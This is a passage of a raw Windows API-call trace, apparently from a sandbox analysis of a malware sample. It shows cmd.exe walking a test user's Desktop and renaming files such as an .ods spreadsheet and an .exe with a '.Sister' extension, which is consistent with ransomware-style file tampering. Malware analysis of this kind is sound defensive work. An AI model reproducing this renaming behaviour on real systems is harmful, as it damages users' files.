GetProcessHeap () returned 0x21ed8c70000 [0120.171] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cc9e80, Size=0x84) returned 0x21ed8cc9e80 [0120.171] GetProcessHeap () returned 0x21ed8c70000 [0120.171] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cc9e80) returned 0x84 [0120.171] malloc (_Size=0xffce) returned 0x21ed8ed08c0 [0120.171] ??_V@YAXPEAX@Z () returned 0x21ed8ed08c0 [0120.171] GetProcessHeap () returned 0x21ed8c70000 [0120.171] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7d000 [0120.171] GetProcessHeap () returned 0x21ed8c70000 [0120.171] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8cc9f20 [0120.171] _wcsicmp (_String1="1KOAcYCUfFYg9R3cp_.ods", _String2=".") returned 3 [0120.171] _wcsicmp (_String1="1KOAcYCUfFYg9R3cp_.ods", _String2="..") returned 3 [0120.171] GetFileAttributesW (lpFileName="1KOAcYCUfFYg9R3cp_.ods" (normalized: "c:\\users\\fd1hvy\\desktop\\1koacycuffyg9r3cp_.ods")) returned 0x20 [0120.172] GetProcessHeap () returned 0x21ed8c70000 [0120.172] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed8cca190 [0120.173] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8cca1a0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0120.173] SetErrorMode (uMode=0x0) returned 0x0 [0120.173] SetErrorMode (uMode=0x1) returned 0x0 [0120.173] GetFullPathNameW (in: lpFileName="1KOAcYCUfFYg9R3cp_.ods", nBufferLength=0x7fe7, lpBuffer=0x21ed8ed08c0, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\1KOAcYCUfFYg9R3cp_.ods", lpFilePart=0xa6cf4fd660*="1KOAcYCUfFYg9R3cp_.ods") returned 0x2e [0120.174] SetErrorMode (uMode=0x0) returned 0x1 [0120.174] GetProcessHeap () returned 0x21ed8c70000 [0120.174] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8cda180 [0120.174] _wcsicmp (_String1="1KOAcYCUfFYg9R3cp_.ods", _String2=".") returned 3 [0120.174] _wcsicmp (_String1="1KOAcYCUfFYg9R3cp_.ods", _String2="..") returned 3 [0120.174] GetFileAttributesW (lpFileName="1KOAcYCUfFYg9R3cp_.ods" (normalized: "c:\\users\\fd1hvy\\desktop\\1koacycuffyg9r3cp_.ods")) returned 0x20 [0120.175] ??_V@YAXPEAX@Z () returned 0x1 [0120.175] malloc (_Size=0xffce) returned 0x21ed8ed08c0 [0120.175] ??_V@YAXPEAX@Z () returned 0x21ed8ed08c0 [0120.175] malloc (_Size=0xffce) returned 0x21ed8ee08a0 [0120.175] ??_V@YAXPEAX@Z () returned 0x21ed8ee08a0 [0120.176] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\1KOAcYCUfFYg9R3cp_.ods" (normalized: "c:\\users\\fd1hvy\\desktop\\1koacycuffyg9r3cp_.ods")) returned 0x20 [0120.176] malloc (_Size=0xffce) returned 0x21ed8ef0880 [0120.176] ??_V@YAXPEAX@Z () returned 0x21ed8ef0880 [0120.177] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\1KOAcYCUfFYg9R3cp_.ods", fInfoLevelId=0x1, lpFindFileData=0x21ed8cc9f30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed8cc9f30) returned 0x21ed8c7cdc0 [0120.177] malloc (_Size=0xffce) returned 0x21ed8f00860 [0120.177] ??_V@YAXPEAX@Z () returned 0x21ed8f00860 [0120.178] ??_V@YAXPEAX@Z () returned 0x1 [0120.178] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\1KOAcYCUfFYg9R3cp_.ods" (normalized: "c:\\users\\fd1hvy\\desktop\\1koacycuffyg9r3cp_.ods"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\1KOAcYCUfFYg9R3cp_.ods.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\1koacycuffyg9r3cp_.ods.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0120.246] FindNextFileW (in: hFindFile=0x21ed8c7cdc0, lpFindFileData=0x21ed8cc9f30 | out: lpFindFileData=0x21ed8cc9f30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46463cd0, ftCreationTime.dwHighDateTime=0x1d5ec98, ftLastAccessTime.dwLowDateTime=0xb6b41e00, ftLastAccessTime.dwHighDateTime=0x1d5eb31, ftLastWriteTime.dwLowDateTime=0xb6b41e00, ftLastWriteTime.dwHighDateTime=0x1d5eb31, nFileSizeHigh=0x0, nFileSizeLow=0x2385, dwReserved0=0x0, dwReserved1=0x0, cFileName="1KOAcYCUfFYg9R3cp_.ods", cAlternateFileName="")) returned 0 [0120.250] GetLastError () returned 0x12 [0120.250] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0120.250] ??_V@YAXPEAX@Z () returned 0x1 [0120.251] ??_V@YAXPEAX@Z () returned 0x1 [0120.311] ??_V@YAXPEAX@Z () returned 0x1 [0120.313] ??_V@YAXPEAX@Z () returned 0x1 [0120.314] GetProcessHeap () returned 0x21ed8c70000 [0120.314] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7d0c0 [0120.314] GetProcessHeap () returned 0x21ed8c70000 [0120.314] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95860, Size=0x16) returned 0x21ed8c95840 [0120.314] GetProcessHeap () returned 0x21ed8c70000 [0120.314] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95840) returned 0x16 [0120.314] GetProcessHeap () returned 0x21ed8c70000 [0120.314] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d330, Size=0x20) returned 0x21ed8c7d330 [0120.314] GetProcessHeap () returned 0x21ed8c70000 [0120.314] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d330) returned 0x20 [0120.314] GetProcessHeap () returned 0x21ed8c70000 [0120.314] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8cda3f0 [0120.314] GetProcessHeap () returned 0x21ed8c70000 [0120.314] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cda3f0, Size=0xb2) returned 0x21ed8cda3f0 [0120.314] GetProcessHeap () returned 0x21ed8c70000 [0120.315] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cda3f0) returned 0xb2 [0120.315] GetProcessHeap () returned 0x21ed8c70000 [0120.315] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8cda4c0 [0120.315] GetProcessHeap () returned 0x21ed8c70000 [0120.315] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cda4c0, Size=0x30) returned 0x21ed8cda4c0 [0120.315] GetProcessHeap () returned 0x21ed8c70000 [0120.315] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cda4c0) returned 0x30 [0120.315] GetProcessHeap () returned 0x21ed8c70000 [0120.315] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8cda500 [0120.315] malloc (_Size=0x1ff9c) returned 0x21ed8ed08c0 [0120.319] GetProcessHeap () returned 0x21ed8c70000 [0120.319] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8c96040 [0120.319] GetProcessHeap () returned 0x21ed8c70000 [0120.319] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed8c96580 [0120.319] ??_V@YAXPEAX@Z () returned 0x1 [0120.320] malloc (_Size=0x1ff9c) returned 0x21ed8ed08c0 [0120.324] GetProcessHeap () returned 0x21ed8c70000 [0120.324] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8c96a00 [0120.324] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21ed8ed08c0, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0120.324] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8cc9ed0, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7ca60 [0120.324] FindClose (in: hFindFile=0x21ed8c7ca60 | out: hFindFile=0x21ed8c7ca60) returned 1 [0120.324] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8cc9ed0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cf40 [0120.324] FindClose (in: hFindFile=0x21ed8c7cf40 | out: hFindFile=0x21ed8c7cf40) returned 1 [0120.325] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x7242029c, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x7242029c, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8cc9ed0, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7ce80 [0120.325] FindClose (in: hFindFile=0x21ed8c7ce80 | out: hFindFile=0x21ed8c7ce80) returned 1 [0120.325] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29182c00, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0x29182c00, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x6a501200, ftLastWriteTime.dwHighDateTime=0x1d61406, nFileSizeHigh=0x0, nFileSizeLow=0x40800, dwReserved0=0x21e, dwReserved1=0xd8cc9ed0, cFileName="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", cAlternateFileName="CUSERS~1.EXE")) returned 0x21ed8c7ca60 [0120.325] FindClose (in: hFindFile=0x21ed8c7ca60 | out: hFindFile=0x21ed8c7ca60) returned 1 [0120.325] _wcsnicmp (_String1="CUSERS~1.EXE", _String2="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", _MaxCount=0x35) returned 22 [0120.325] malloc (_Size=0x1ff9c) returned 0x21ed8ef0870 [0120.325] ??_V@YAXPEAX@Z () returned 0x21ed8ef0870 [0120.326] GetProcessHeap () returned 0x21ed8c70000 [0120.327] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8cde520 [0120.327] ??_V@YAXPEAX@Z () returned 0x1 [0120.327] ??_V@YAXPEAX@Z () returned 0x1 [0120.328] GetProcessHeap () returned 0x21ed8c70000 [0120.328] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cda500, Size=0x490) returned 0x21ed8cda500 [0120.328] GetProcessHeap () returned 0x21ed8c70000 [0120.328] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cda500) returned 0x490 [0120.328] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0120.328] _get_osfhandle (_FileHandle=1) returned 0x50 [0120.328] GetFileType (hFile=0x50) returned 0x2 [0120.329] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0120.329] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0120.553] _get_osfhandle (_FileHandle=1) returned 0x50 [0120.553] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0120.958] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0120.958] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0120.959] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0120.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0120.959] GetFileType (hFile=0x50) returned 0x2 [0120.959] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0120.959] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0121.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0121.075] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x18) returned 1 [0121.198] _get_osfhandle (_FileHandle=1) returned 0x50 [0121.198] GetFileType (hFile=0x50) returned 0x2 [0121.198] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0121.198] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0121.460] _get_osfhandle (_FileHandle=1) returned 0x50 [0121.460] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8cda4d0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed8cda4d0*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0121.598] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0121.598] _get_osfhandle (_FileHandle=1) returned 0x50 [0121.598] GetFileType (hFile=0x50) returned 0x2 [0121.598] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0121.598] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0122.097] _get_osfhandle (_FileHandle=1) returned 0x50 [0122.097] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0122.265] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0122.265] _get_osfhandle (_FileHandle=1) returned 0x50 [0122.265] GetFileType (hFile=0x50) returned 0x2 [0122.265] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0122.265] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0122.445] _get_osfhandle (_FileHandle=1) returned 0x50 [0122.445] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0122.581] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0122.700] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0122.701] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0122.702] malloc (_Size=0xffce) returned 0x21ed8ed08c0 [0122.703] ??_V@YAXPEAX@Z () returned 0x21ed8ed08c0 [0122.704] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0122.704] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0122.704] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0122.704] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0122.704] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0122.704] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0122.704] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0122.704] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0122.704] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0122.704] ??_V@YAXPEAX@Z () returned 0x1 [0122.704] GetProcessHeap () returned 0x21ed8c70000 [0122.704] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8cda9a0 [0122.704] GetProcessHeap () returned 0x21ed8c70000 [0122.704] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cda9a0, Size=0x130) returned 0x21ed8cda9a0 [0122.705] GetProcessHeap () returned 0x21ed8c70000 [0122.705] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cda9a0) returned 0x130 [0122.705] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0122.705] malloc (_Size=0xffce) returned 0x21ed8ed08c0 [0122.705] ??_V@YAXPEAX@Z () returned 0x21ed8ed08c0 [0122.705] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0122.705] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed8ed08c0, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0122.709] ??_V@YAXPEAX@Z () returned 0x1 [0122.709] GetProcessHeap () returned 0x21ed8c70000 [0122.709] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8cdaae0 [0122.709] GetProcessHeap () returned 0x21ed8c70000 [0122.709] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8cdac20 [0122.709] GetProcessHeap () returned 0x21ed8c70000 [0122.709] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cdac20, Size=0x130) returned 0x21ed8cdac20 [0122.709] GetProcessHeap () returned 0x21ed8c70000 [0122.709] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cdac20) returned 0x130 [0122.709] malloc (_Size=0xffce) returned 0x21ed8ed08c0 [0122.709] ??_V@YAXPEAX@Z () returned 0x21ed8ed08c0 [0122.710] GetProcessHeap () returned 0x21ed8c70000 [0122.710] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7ce80 [0122.710] GetProcessHeap () returned 0x21ed8c70000 [0122.710] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8cdad60 [0122.710] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0122.710] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0122.710] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0122.710] GetLastError () returned 0x2 [0122.710] GetProcessHeap () returned 0x21ed8c70000 [0122.710] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed8cde5a0 [0122.712] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8cde5b0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0122.712] SetErrorMode (uMode=0x0) returned 0x0 [0122.712] SetErrorMode (uMode=0x1) returned 0x0 [0122.712] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21ed8ed08c0, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0122.713] SetErrorMode (uMode=0x0) returned 0x1 [0122.713] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0122.713] GetProcessHeap () returned 0x21ed8c70000 [0122.713] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8cee590 [0122.713] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0122.713] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0122.713] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0122.713] GetLastError () returned 0x2 [0122.713] ??_V@YAXPEAX@Z () returned 0x1 [0122.713] malloc (_Size=0xffce) returned 0x21ed8ed08c0 [0122.713] ??_V@YAXPEAX@Z () returned 0x21ed8ed08c0 [0122.713] malloc (_Size=0xffce) returned 0x21ed8ee08a0 [0122.714] ??_V@YAXPEAX@Z () returned 0x21ed8ee08a0 [0122.714] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0122.714] GetLastError () returned 0x2 [0122.714] _get_osfhandle (_FileHandle=2) returned 0x54 [0122.714] GetFileType (hFile=0x54) returned 0x2 [0122.714] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0122.715] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0122.935] _get_osfhandle (_FileHandle=2) returned 0x54 [0122.936] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0123.100] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0123.100] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0123.100] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0123.266] longjmp () [0123.266] ??_V@YAXPEAX@Z () returned 0x1 [0123.267] FindNextFileW (in: hFindFile=0x21ed8c7cac0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72b6def0, ftCreationTime.dwHighDateTime=0x1d5e4d2, ftLastAccessTime.dwLowDateTime=0xd3f2e690, ftLastAccessTime.dwHighDateTime=0x1d5e0c8, ftLastWriteTime.dwLowDateTime=0xd3f2e690, ftLastWriteTime.dwHighDateTime=0x1d5e0c8, nFileSizeHigh=0x0, nFileSizeLow=0x1463, dwReserved0=0x0, dwReserved1=0xd8c00000, cFileName="23wggka_3I9jMmhYgMoj.jpg", cAlternateFileName="")) returned 1 [0123.268] GetProcessHeap () returned 0x21ed8c70000 [0123.268] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7c830, Size=0x94) returned 0x21ed8cee800 [0123.268] GetProcessHeap () returned 0x21ed8c70000 [0123.268] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cee800) returned 0x94 [0123.268] GetProcessHeap () returned 0x21ed8c70000 [0123.268] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8cee8a0 [0123.268] GetProcessHeap () returned 0x21ed8c70000 [0123.269] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cee8a0, Size=0x30) returned 0x21ed8cee8a0 [0123.269] GetProcessHeap () returned 0x21ed8c70000 [0123.269] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cee8a0) returned 0x30 [0123.269] GetProcessHeap () returned 0x21ed8c70000 [0123.269] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8cee8e0 [0123.269] malloc (_Size=0x1ff9c) returned 0x21ed8ef0880 [0123.273] GetProcessHeap () returned 0x21ed8c70000 [0123.273] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x42) returned 0x21ed8c7c020 [0123.273] ??_V@YAXPEAX@Z () returned 0x1 [0123.274] GetProcessHeap () returned 0x21ed8c70000 [0123.274] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cee8e0, Size=0x200) returned 0x21ed8cee8e0 [0123.274] GetProcessHeap () returned 0x21ed8c70000 [0123.274] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cee8e0) returned 0x200 [0123.274] 